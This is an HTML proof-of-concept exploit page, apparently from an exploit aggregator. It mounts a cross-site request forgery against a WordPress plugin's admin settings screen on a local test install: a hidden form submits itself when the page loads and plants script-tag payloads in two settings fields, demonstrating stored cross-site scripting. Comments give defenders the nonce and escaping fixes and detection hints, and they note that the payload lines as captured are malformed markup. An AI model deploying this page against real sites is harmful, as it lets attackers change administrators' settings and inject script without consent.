## https://sploitus.com/exploit?id=WPEX-ID:7CFEFCC9-ADBF-4AFC-B25F-92F417650359
<!DOCTYPE html>
<!--
  Proof-of-concept page for a cross-site request forgery (CSRF) against a
  WordPress admin settings screen (wp-admin/admin.php?page=loc_menu) on a
  local test install at 127.0.0.1.

  What the listing shows:
    * The form is submitted automatically when the page loads (body onload).
    * The form contains no nonce field; the only thing tying the request to
      an administrator is whatever session cookie the browser attaches.
    * Two of the submitted settings (key_1, url_1) carry an alert(1) marker.

  Reviewer notes for defenders (the server-side handler is not on this page,
  so these are assumptions to confirm against the plugin code):
    * Presumably the settings handler saves the POST without verifying a
      nonce. The usual WordPress fix is wp_nonce_field() in the settings form
      and check_admin_referer() plus current_user_can() before saving.
    * Presumably the saved values are echoed back into the settings page
      unescaped. Sanitize on save (sanitize_text_field(), esc_url_raw()) and
      escape on output (esc_attr(), esc_url()).
    * Detection: POSTs to this admin page whose Origin or Referer header is
      not the site itself, and stored option values containing angle brackets.
-->

<html>
<head>
<meta charset="utf-8">
<title>CSRF PoC</title>
</head>

<!-- The onload handler submits the form without any user interaction. -->
<body onload="csrfSubmit();">
<!-- The form posts url-encoded settings to the admin page; target="dummyfrm" sends the response to the hidden iframe below. -->
<form target="dummyfrm" name="evilform" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=loc_menu" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="loc_sensitive" value="No" />
<input type="hidden" name="loc_target_blank" value="No" />
<input type="hidden" name="loc_back" value="Yes" />
<!--
  key_1 and url_1 carry a harmless alert(1) marker, presumably to show that
  the stored value is not escaped when the settings page is rendered.
  NOTE(review): as captured here, the literal double quote ends the value
  attribute early, so these two lines are not well-formed markup; the
  original entity encoding was presumably lost when the page was extracted.
-->
<input type="hidden" name="key_1" value=""><script>alert(1)</script>" />
<input type="hidden" name="url_1" value=""><script>alert(1)</script>" />
<input type="hidden" name="key_2" value="" />
<input type="hidden" name="url_2" value="" />
<input type="hidden" name="submitted" value="" />
</form>
<!-- Hidden 1x1 frame whose name matches the form's target, so the response loads here instead of replacing this page. -->
<iframe src="x" width="1" height="1" name="dummyfrm" style="visibility:hidden"></iframe>
<script>
// Submits the form named "evilform"; called from the body's onload attribute.
function csrfSubmit(){
    // Takes submit() from HTMLFormElement.prototype and binds it to the form,
    // so a form control named "submit" could not shadow the method.
    let submit = HTMLFormElement.prototype["submit"].bind(document.evilform);
    submit();
}
</script>

<p>CSRF PoC</p>
</html>